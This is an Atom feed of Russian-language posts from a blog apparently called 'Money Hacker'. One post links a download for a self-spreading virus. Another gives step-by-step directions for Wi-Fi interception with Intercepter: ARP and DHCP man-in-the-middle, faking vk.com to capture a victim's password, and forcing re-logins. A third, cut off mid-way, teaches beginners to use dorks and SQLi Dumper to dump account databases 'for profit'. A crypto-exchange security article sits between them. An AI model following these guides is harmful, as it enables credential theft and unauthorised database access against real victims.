<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>@money_hacker</title><author><name>@money_hacker</name></author><id>https://teletype.in/atom/money_hacker</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/money_hacker?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@money_hacker?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=money_hacker"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/money_hacker?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-22T04:13:10.790Z</updated><entry><id>money_hacker:Bk6GXugTX</id><link rel="alternate" type="text/html" href="https://teletype.in/@money_hacker/Bk6GXugTX?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=money_hacker"></link><title>Делаем самораспространяющийся вирус</title><published>2018-11-07T14:13:41.047Z</published><updated>2018-11-07T14:13:41.047Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/06/06d50fc0-b3db-4554-8996-7bcb9fbef277.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/18/18a40a4b-5e6a-4bfe-a7cf-cccd8199948a.png&quot;&gt;Скачать мануал: https://yadi.sk/i/2lRPKu3J3PQxUG</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/18/18a40a4b-5e6a-4bfe-a7cf-cccd8199948a.png&quot; width=&quot;1000&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Скачать мануал: &lt;a href=&quot;https://yadi.sk/i/2lRPKu3J3PQxUG&quot; target=&quot;_blank&quot;&gt;https://yadi.sk/i/2lRPKu3J3PQxUG&lt;/a&gt;&lt;/p&gt;
  &lt;h2&gt;*****************************************************&lt;/h2&gt;
  &lt;h2&gt;&lt;a href=&quot;https://t.me/money_hacker&quot; target=&quot;_blank&quot;&gt;Money Hacker&lt;/a&gt; - ПОДПИШИСЬ!&lt;/h2&gt;

</content></entry><entry><id>money_hacker:ByeCS_h3X</id><link rel="alternate" type="text/html" href="https://teletype.in/@money_hacker/ByeCS_h3X?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=money_hacker"></link><title>Как перехватывать трафик внутри Wi-Fi сети</title><published>2018-11-04T13:36:08.241Z</published><updated>2018-11-04T13:36:08.241Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/21/21e8c4f1-fcad-414c-9093-284e94ccc11a.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/db/db408710-5780-4a53-87e1-1dabafc20e8a.png&quot;&gt;В этой статье рассмотрим бесплатное программное обеспечение для получения удаленного доступа в локальных системах. Цель этой статьи – показать какие последствия могут быть при использовании публичных WiFi сетей.</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/db/db408710-5780-4a53-87e1-1dabafc20e8a.png&quot; width=&quot;1000&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В этой статье рассмотрим бесплатное программное обеспечение для получения удаленного доступа в локальных системах. Цель этой статьи – показать какие последствия могут быть при использовании публичных WiFi сетей.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Intercepter&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;&lt;strong&gt;Intercepter&lt;/strong&gt; – это многофункциональный сетевой инструмент, который позволяет получить данные из трафика (пароли, сообщения в мессенджерах, переписки и т.д.) и реализовать различные MiTM-атаки.&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/953c2b0aae8398d8feec6.png&quot; width=&quot;772&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;Основной функционал&lt;/h3&gt;
  &lt;ul&gt;
    &lt;li&gt;Перехват сообщений мессенджеров.&lt;/li&gt;
    &lt;li&gt;Перехват кукис файлов и паролей.&lt;/li&gt;
    &lt;li&gt;Перехват активности (страницы, файлы, данные).&lt;/li&gt;
    &lt;li&gt;Возможность подмены скачивания файлов, добавляя вредоносные файлы. Можно использовать совместно с другими утилитами.&lt;/li&gt;
    &lt;li&gt;Подмена сертификатов Https на Http.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3&gt;Режимы работы&lt;/h3&gt;
  &lt;p&gt;&lt;strong&gt;Messengers Mode &lt;/strong&gt;– позволяет проверять переписку, которая была отправлена в незашифрованном виде. Применялась для перехвата сообщений в таких мессенджерах ICQ, AIM, JABBER сообщений.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Ressurection Mode&lt;/strong&gt; – восстановления полезных данных из трафика, из протоколов которые передают трафик в открытом виде. Когда жертва просматривает файлы, страницы, данные, можно частично или полностью их перехватывать. Дополнительно можно указать размер файлов, чтобы не загружать программу маленькими частями. Эту информацию можно использовать для анализа.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Password Mode&lt;/strong&gt; – режим для работы с куки файлами. Таким образом, можно получить доступы к посещаемым файлам жертвы.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Scan mode&lt;/strong&gt; – основной режим для тестирования. Для начала сканирования необходимо нажать правой кнопкой мыши Smart Scan. После сканирования в окне будут отображаться все участники сети, их операционная система и другие параметры.&lt;/p&gt;
  &lt;p&gt;Дополнительно в этом режиме можно просканировать порты. Необходимо воспользоваться функцией Scan Ports. Конечно для этого есть и намного функциональные утилиты, но наличие этой функции – важный момент.&lt;/p&gt;
  &lt;p&gt;Если в сети нас интересует целенаправленная атака, то после сканирования необходимо добавить целевой IP в Nat с помощью команды (Add to Nat). В другом окне можно будет провести другие атаки.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Nat Mode. &lt;/strong&gt;Основной режим, который позволяет проводить ряд атак по ARP. Это основное окно, которое позволяет проводить целенаправленные атаки.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;DHCP mode. &lt;/strong&gt;Это режим, который позволяет поднять свой DHCP сервер для реализации атак DHCP по середине.&lt;/p&gt;
  &lt;h3&gt;Некоторые виды атак, которые можно проводить&lt;/h3&gt;
  &lt;p&gt;&lt;strong&gt;&lt;em&gt;Подмена сайта&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Для подмена сайта у жертвы необходимо перейти в Target, после этого необходимо указать сайт и его подмену. Таким образом можно подменить достаточно много сайтов. Все зависит от того, насколько качественный будет фейк.&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/8f002e505b37fadd0051a.png&quot; width=&quot;959&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/9ce5f0a02a34446e9affa.png&quot; width=&quot;753&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/23bd63062b68fee1232f7.png&quot; width=&quot;354&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/933f77a6020b4731e6813.png&quot; width=&quot;814&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В результате жертва открывает фейковый сайт при запросе vk.com. И в режиме паролей должен быть логин и пароль жертвы:&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/e3d4a8cb2d2d9d179886f.png&quot; width=&quot;873&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;&lt;strong&gt;&lt;em&gt;Расшифровка трафика&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Чтобы провести целенаправленную атаку необходимо выбрать жертву из списку и добавить ее в таргет. Это можно сделать с помощью правой кнопкой мыши.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/08c84e81f3234a8aaeb86.png&quot; width=&quot;595&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Теперь можно в режиме Ressurection Mode восстановить разные данные из трафика.&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/e67c1e360d45168ca6708.png&quot; width=&quot;1037&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;&lt;strong&gt;&lt;em&gt;Подмена трафика&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/4e9b07e587015dc5eeca9.png&quot; width=&quot;664&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Далее необходимо указать в настройках несколько параметров:&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/fd2e8f4ae6e54760260e2.png&quot; width=&quot;704&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;После этого у жертвы будет меняться запрос &amp;quot;trust&amp;quot; на &amp;quot;loser&amp;quot;.&lt;/p&gt;
  &lt;p&gt;Дополнительно можно убить кукис-файлы, чтобы жертва вышла со всех аккаунтов и повторно авторизовалась. Это позволит перехватить логины и пароли.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/69f810d96999ed41da5f1.png&quot; width=&quot;467&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;Как увидеть потенциального сниферра в сети с помощью Intercepter?&lt;/h3&gt;
  &lt;p&gt;С помощью опции Promisc Detection можно обнаружить устройство, которое ведет сканирование в локальной сети. После сканирование в графе status будет «Sniffer». Это первый способ, которые позволяет определить сканирование в локальной сети.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/d671e72d3f991b21f0de8.png&quot; width=&quot;659&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;&lt;strong&gt;Устройство SDR HackRF &lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/84466d0e10663c43414be.png&quot; width=&quot;1350&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;SDR - это своеобразный радиоприемник, который позволяет работать с разными радиочастотными параметрами. Таким образом, можно перехватывать сигнал Wi-Fi, GSM, LTE и т.д.&lt;/p&gt;
  &lt;p&gt;HackRF - это полноценное SDR-устройство за 300 долларов. Автор проекта Майкл Оссман разрабатывает успешные устройства в этом направлении. Ранее был разработан и успешно реализован Bluetooth-снифер Ubertooth. HackRF успешный проект, который собрал более 600 тысяч на Kickstarter. Уже было реализовано 500 таких устройств для бета-тестирования.&lt;/p&gt;
  &lt;p&gt;HackRF работает в диапазоне частот от 30 МГц до 6 ГГц. Частота дискретизации составляет 20 МГц, что позволяет перехватывать сигналы Wi-FI и LTE сетей.&lt;/p&gt;
  &lt;h3&gt;Как обезопасить себя на локальном уровне?&lt;/h3&gt;
  &lt;p&gt;Для начала воспользуемся софтом SoftPerfect WiFi Guard. Есть портативная версия, которая занимает не более 4 мб. Она позволяет сканировать вашу сеть и отображать, какие устройства в ней отображены. В ней есть настройки, которые позволяют выбрать сетевую карту и максимальное количество сканируемых устройств. Дополнительно можно выставить интервал сканирования.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/dbc26398ded1d04a7a694.png&quot; width=&quot;646&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;После сканирования программа присылает уведомления, сколько есть неизвестный устройств. Это позволяет нам добавлять и отмечать доверенных пользователей и заметить, если кто-то подключился и начинает прослушивать трафик. Уведомления будут приходить после каждого интервала сканирования. Это позволяет отключить определенного мошенника на уроне роутера, если есть подозрительные действия.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/8ed0d6cbf56bd1bc09b8d.png&quot; width=&quot;407&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/dd699dd7c713be52363aa.png&quot; width=&quot;646&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/c769bbb62597ec21aacca.png&quot; width=&quot;391&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;Заключение&lt;/h3&gt;
  &lt;p&gt;Таким образом, мы рассмотрели на практике, как использовать программное обеспечение для перехвата данных внутри сети. Рассмотрели несколько конкретных атак, которые позволяют получить данные для входа, а также другую информацию. Дополнительно рассмотрели SoftPerfect WiFi Guard, которые позволяет на примитивном уровне защитить локальную сеть от прослушивания трафика.&lt;/p&gt;
  &lt;h2&gt;*****************************************************&lt;/h2&gt;
  &lt;h2&gt;&lt;a href=&quot;https://t.me/money_hacker&quot; target=&quot;_blank&quot;&gt;Money Hacker&lt;/a&gt; - ПОДПИШИСЬ!&lt;/h2&gt;

</content></entry><entry><id>money_hacker:ryeGGWzh7</id><link rel="alternate" type="text/html" href="https://teletype.in/@money_hacker/ryeGGWzh7?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=money_hacker"></link><title>Как взламывают криптовалютные биржи</title><published>2018-10-27T15:19:35.701Z</published><updated>2018-10-27T15:19:35.701Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/f2/f22b64bc-96f6-45eb-be22-bdacf7139334.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/3d/3d38e449-37e5-4a96-8e34-025e40e9f219.png&quot;&gt;Прогремевший в конце января 2018 года взлом японской криптовалютной биржи Coicheck не только лишил пользователей токенов на сумму, эквивалентную более $500 млн, но и здорово пошатнул уверенность криптосообщества в степени киберзащиты подобных центров обмена.</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/3d/3d38e449-37e5-4a96-8e34-025e40e9f219.png&quot; width=&quot;1000&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Прогремевший в конце января 2018 года взлом японской криптовалютной биржи Coicheck не только лишил пользователей токенов на сумму, эквивалентную более $500 млн, но и здорово пошатнул уверенность криптосообщества в степени киберзащиты подобных центров обмена.&lt;/p&gt;
  &lt;p&gt;В результате 5 марта японцы объединились против внешнего врага — организация, в которую войдут 16 лицензированных бирж, будет не только заниматься саморегулированием, но и противостоять атакам хакеров. Растущая популярность всего, обладающего приставкой «блокчейн» и пахнущего быстрыми деньгами, неизбежным образом привлекает к этой сфере мошенников.&lt;/p&gt;
  &lt;p&gt;Пока криптобиржи, разработчики и держатели электронных кошельков пренебрегают безопасностью, растет число сообщений об «ограблениях века» и многомиллионных хищениях с криптовалютных площадок. Чем промышляют криптобандиты, каков их набор средств и — самое главное! — что делать, чтобы не стать жертвой.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Как мухи на варенье&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Согласно &lt;a href=&quot;https://www.group-ib.com/media/ico-100/&quot; target=&quot;_blank&quot;&gt;отчету Group-IB&lt;/a&gt;, одного из лидеров рынка по кибербезопасности, блокчейн-проекты остаются лакомым куском для тех, кто промышляет разного рода атаками и хищениями. В среднем один ICO проект подвергается атакам как минимум 100 раз. Международные криптовалютные площадки, где оборот средств в разы выше, становятся мишенями злоумышленников ничуть не реже. Только цифры и убытки, как правило, гораздо внушительнее.&lt;/p&gt;
  &lt;p&gt;Южнокорейская криптовалютная биржа Youbit подвергалась хакерским взломам в апреле и декабре 2017 года. Первый взлом привел к потере около 4000 биткоинов, второй лишил биржу 17% всех активов и привел к закрытию. NiceHash, площадка для покупки, продажи и аренды майнингового оборудования, была взломана в начале декабря 2017 года, общая сумма ущерба — $80 млн.&lt;/p&gt;
  &lt;p&gt;Популярную японскую криптобиржу Coincheck в конце января 2018 года навестили злоумышленники, которым удалось перевести на свои электронные кошельки 523 млн токенов криптовалюты NEM, стоивших на тот момент, примерно $534 млн. А были еще кейсы с биржами Bithumb, Mt. Gox — cписок можно продолжать, как говорят американцы, you name it.&lt;/p&gt;
  &lt;p&gt;«Количество атак на криптовалютные биржи резко возросло как раз в тот момент, когда сами цифровые валюты начали расти в цене. В декабре 2017 года стоимость Bitcoin достигла $20 000, что не могло не привлечь внимание киберпреступников, — отмечает генеральный директор компании SEC Consult Services Георгий Лагода. — При этом уровень защиты этих площадок против кибератак оказался недостаточно высоким, чтобы предотвратить миллионные потери».&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Ловись, биржа, большая и маленькая&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;В чем уязвимость блокчейна при кибератаке? Во-первых, разработчики неверным образом зачастую полагают, что слова «крипто» и «блокчейн» означают безопасность по умолчанию.&lt;/p&gt;
  &lt;p&gt;«Должное внимание не уделяется ни качеству кода, ни сетевой архитектуре, — замечает Георгий Лагода, — а ведь они могут быть уязвимы. Отдельного внимания заслуживает безопасность смарт-контрактов. И здесь зачастую полагаются на безопасность структуры блокчейна, упуская из виду небезопасное использование генераторов псевдослучайных чисел, используя данные из основной сети Bitcoin или аналогичных валют в качестве источника случайной величины».&lt;/p&gt;
  &lt;p&gt;В феврале специалисты подсчитали, что &lt;a href=&quot;https://motherboard.vice.com/en_us/article/8xddka/millions-of-dollars-in-ethereum-are-vulnerable-to-hackers-right-now-smart-contract-bugs&quot; target=&quot;_blank&quot;&gt;из миллиона смарт-контрактов Ethereum уязвимостями обладают более 34 000.&lt;/a&gt; Исследователи из Университетского Колледжа Лондона проверили свои предположения на 3000 смарт-контрактах блокчейна Ethereum. 89% из них оказались носителями тех или иных багов, что теоретически позволило бы украсть эфиров на сумму $6 млн.&lt;/p&gt;
  &lt;p&gt;Самыми популярными атаками на сегодняшний день являются атаки типа DDoS и фишинг.&lt;/p&gt;
  &lt;p&gt;В целом, аббревиатура DDoS (Distributed Denial of Service — распределенный отказ в обслуживании) уже давно украшает сводки новостей и вызывает трепет пользователей. При такой атаке хакеры направляют на сервер искусственно созданный трафик, имеющий несколько источников, чтобы создать для сервера непосильную нагрузку, и «кладут» его.&lt;/p&gt;
  &lt;p&gt;В этом случае биржи также теряют деньги, ведь при отсутствии доступа, особенно длительного, пользователи биржи не могут использовать ее функции, и капитал не движется. Криптовалютная биржа Bitfinex в декабре 2017 года &lt;a href=&quot;https://cryptocurrency.tech/bitfinex-podverglas-ddos-atake/&quot; target=&quot;_blank&quot;&gt;подверглась мощнейшей атаке такого рода.&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Фишинг (phishing) — мошенничество, основанное на принципах социальной инженерии. Сначала создается практически точная копия сайта, например, выбранной злоумышленниками биржи. Затем при помощи спам-технологий рассылается письмо, составленное таким образом, чтобы быть максимально похожим на настоящее письмо от биржи.&lt;/p&gt;
  &lt;p&gt;Почти в точности повторяются логотипы, имена и фамилии реальных руководителей. Сообщается о том, что из-за смены программного обеспечения или — вот ирония! — из-за нападения хакеров пользователю необходимо подтвердить или изменить свои учетные данные. Во всех случаях цель таких писем одна — заставить пользователя нажать на приведенную ссылку, а затем ввести свои конфиденциальные данные на ложном сайте.&lt;/p&gt;
  &lt;p&gt;Пользователи популярной криптовалютной биржи Binance &lt;a href=&quot;https://thenextweb.com/hardfork/2018/01/04/binance-cryptocurrency-exchange-scam/&quot; target=&quot;_blank&quot;&gt;несколько недель назад стали жертвами&lt;/a&gt; таких трюкачей, причем отличить настоящий сайт от фейка невооруженным глазом было почти невозможно.&lt;/p&gt;
  &lt;p&gt;Поэтому красной линией любых списков рекомендаций от экспертов всегда проходит заклинание: не хранить значительные средства на биржах и использовать эти площадки только для сделок.&lt;/p&gt;
  &lt;p&gt;«Атаки на ICO — те вообще происходят постоянно, — утверждает Евгений Юртаев, директор финтех-компании Zerion, производителя программного обеспечения. — Один из самых частых примеров — спуфинг, когда злоумышленники получают доступ к DNS сайта и перенаправляют его на несуществующий домен. От такой атаки пострадала, например, Enigma, когда на поддельном сайте выставили адрес, куда надо было отправлять эфиры, и было украдено больше $500 000. Общей рекомендацией остается не хранить крупные суммы денег на централизованных биржах и по возможности использовать децентрализованные альтернативы, которые набирают ликвидность».&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Щит, меч и регистрация&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Что делать? Существует способ приблизить размер рисков к нулю: проведение внутренних и внешних аудитов информационной безопасности, постоянный мониторинг активности пользователей и использование рекомендованных экспертами решений. Существует, например, чаще других используемый аудиторами международный стандарт CobiT (Control Objectives for Information and related Technology).&lt;/p&gt;
  &lt;p&gt;Одна из основ блокчейна — использование смарт-контракта. Его всесторонний аудит также нужно проводить в обязательном порядке. Отличие от «обычной» защиты информации в критичности системы и объеме денег, который постоянно крутится в проекте, а также в своей логике работы системы.&lt;/p&gt;
  &lt;p&gt;Чтобы защитить своих пользователей, бирже нужно прежде всего защитить себя. Самым распрост��аненным решением является использование двухфакторной аутентификации (2FA) и «холодных» серверов.&lt;/p&gt;
  &lt;p&gt;Некоторые биржи идут дальше и просят пользователей предоставить копии документов. Например, на Bittrex тре­бу­ет­ся ве­ри­фи­ка­ция ак­ка­ун­та с ука­за­ни­ем пер­со­наль­ных дан­ных для вы­во­да циф­ро­вой ва­лю­ты общим объ­е­мом до 3 биткоинов в день.&lt;/p&gt;
  &lt;p&gt;При вы­во­де до 100 бит­ко­и­нов в день — с предо­став­ле­ни­ем копии удо­сто­ве­ре­ния лич­но­сти. Кроме того, ос­нов­ная часть всех циф­ро­вых ак­ти­вов биржи хра­нит­ся офлайн на «хо­лод­ных», то есть фи­зи­че­ски не под­клю­чен­ных ни к ка­ко­му ком­пью­те­ру, но­си­те­лям и вы­во­дит­ся он­лайн толь­ко при со­вер­ше­нии тран­зак­ций.&lt;/p&gt;
  &lt;p&gt;Также существуют процедуры AML (Anti Money Laundering — борьба с отмыванием денег) и КУС (Know Your Client — знай своего клиента), которые биржи объявляют обязательными.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Ключ от квартиры, где деньги лежат&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Говорят, что существует три вида лжи: ложь во благо, отъявленная ложь и статистика. Так вот, статистика говорит, что на 1000 строк исходного кода в среднем насчитывается &lt;a href=&quot;https://www.securitylab.ru/news/420674.php&quot; target=&quot;_blank&quot;&gt;1 ошибка&lt;/a&gt;. И нет никакой уверенности, что именно этот баг не будет связан с безопасностью.&lt;/p&gt;
  &lt;p&gt;Как утверждают эксперты по кибербезопасности, даже если разработчики биржи напишут идеальный код, всегда остается риск, что в сторонних проектах, которые им приходится использовать, будут уязвимости.&lt;/p&gt;
  &lt;p&gt;«Поскольку любая биржа, и не только криптовалютная, это «про деньги», отдельное место в общем спектре атак играют атаки, основанные на социальной инженерии. А также, как ни удивительно, случайные события, причиной которых служат обычная человеческая глупость и невнимательность. Рядовые пользователи — часто большие любители слабых паролей, потерянных «холодных» кошельков, использования «горячих» кошельков и публичного Wi-Fi для доступа к большому объему средств, перехода по подозрительным ссылкам», — описывает распространенные ошибки Георгий Лагода.&lt;/p&gt;
  &lt;p&gt;В конечном итоге пользователь или площадка, у которых украли средства тем или иным способом, вынуждены рассчитывать лишь на честность хакеров, так как в отличие от традиционной финансовой среды алгоритмы возмещения утраченных средств в криптосфере не отработаны. Если хакеры взломают ваш банковский счет и уведут с него значительную сумму денег, то банк может отследить и аннулировать криминальные транзакции, возместив ущерб.&lt;/p&gt;
  &lt;p&gt;Компенсация украденной криптовалюты проблематична или просто невозможна по технологическим причинам и в силу анонимности транзакций. Тем более любопытно выглядит история неизвестного Робина Гуда хакерского происхождения, который по неизвестной причине &lt;a href=&quot;https://cryptocurrency.tech/pohititeli-vernuli-20-000-eth-proektu-coindash/&quot; target=&quot;_blank&quot;&gt;вернул $26 млн&lt;/a&gt; в токенах Ethereum в лоно ограбленной им в прошлом году биржи CoinDash. Рассчитывать на подобный альтруизм в большинстве случаев не приходится.&lt;/p&gt;
  &lt;p&gt;Поэтому стоит помнить:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;во-первых, и у хайпа есть цена;&lt;/li&gt;
    &lt;li&gt;во-вторых, безопасность, как всегда, превыше всего.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h2&gt;*****************************************************&lt;/h2&gt;
  &lt;h2&gt;&lt;a href=&quot;https://t.me/money_hacker&quot; target=&quot;_blank&quot;&gt;Money Hacker&lt;/a&gt; - ПОДПИШИСЬ!&lt;/h2&gt;

</content></entry><entry><id>money_hacker:rk7mTZedX</id><link rel="alternate" type="text/html" href="https://teletype.in/@money_hacker/rk7mTZedX?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=money_hacker"></link><title>Добыча аккаунтов. Заработок на дампе.</title><published>2018-09-07T14:37:14.753Z</published><updated>2018-09-07T14:37:14.753Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/c3/c3a8d59d-e06d-4d78-96ba-526bac55f66a.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/aa/aa2d31b1-9d0c-4af5-883a-e9e3ddefe92a.png&quot;&gt;Статья написана для новичков.</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/aa/aa2d31b1-9d0c-4af5-883a-e9e3ddefe92a.png&quot; width=&quot;1000&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Статья написана для новичков.&lt;/p&gt;
  &lt;p&gt;&amp;quot;Как дампить?&amp;quot; или &amp;quot;Где брать аккаунты?&amp;quot;. Так вот сегодня мы и будем добывать аккаунты и получать с них профит.&lt;/p&gt;
  &lt;p&gt;Что нам потребуется:&lt;/p&gt;
  &lt;ol&gt;
    &lt;li&gt;Мозги и ровные руки.&lt;/li&gt;
    &lt;li&gt;Дорки.&lt;/li&gt;
    &lt;li&gt;Прокси желательно приватные, но можно и паблик.&lt;/li&gt;
    &lt;li&gt;Для лучшего результата приват софт.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p&gt;Я не буду описывать создание дорок, есть достаточно статей и способов для этого.&lt;/p&gt;
  &lt;p&gt;Итак приступим:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Открываем Searcher нажимаем &amp;quot;Sourse&amp;quot; и выбираем наши дорки.&lt;/li&gt;
    &lt;li&gt;Нажимаем &amp;quot;Proxy&amp;quot; и загружаем прокси.&lt;/li&gt;
    &lt;li&gt;Настраиваем прокси как на картинке:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/57667933839c6dc8681c1.png&quot; width=&quot;789&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul&gt;
    &lt;li&gt;Жмем &amp;quot;Start&amp;quot; и ждем конца парсинга (ну или пока не надоест).&lt;/li&gt;
    &lt;li&gt;Открываем SQLi Dumper и импортируем наши ссылки:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/189cc82e45620821e7190.png&quot; width=&quot;743&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul&gt;
    &lt;li&gt;Переходим в следующую вкладку и жмем &amp;quot;Start Exploiter&amp;quot; ждем окончания проверки.&lt;/li&gt;
    &lt;li&gt;Во вкладке &amp;quot;Injectables&amp;quot; выставляем галочки как на скриншоте и жмем &amp;quot;Start Analyzer&amp;quot;:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/679b6b39a492b3fbb8c32.png&quot; width=&quot;746&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul&gt;
    &lt;li&gt;После того как дождались конца выделяем все ссылки и жмем Search Columns\ Tables Names, пишем то что будем искать к примеру:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/050aead409cc0f6b06c11.png&quot; width=&quot;756&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul&gt;
    &lt;li&gt;Жмем &amp;quot;Start&amp;quot;, ищем одинаковое число в скобках:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/0dcc4a7aa051f4cc48a18.png&quot; width=&quot;465&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul&gt;
    &lt;li&gt;Выбираем одну из них и жмем &amp;quot;Go To Dumper&amp;quot;, &amp;quot;Dumper form&amp;quot;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/83e39efbcb19f4221eaa7.png&quot; width=&quot;319&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul&gt;
    &lt;li&gt;Выбираем нужную колонку в нашем случае user и жмем &amp;quot;Get Columns&amp;quot;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/9884228218e5a77465b35.png&quot; width=&quot;326&quot; /&gt;
  &lt;/figure&gt;
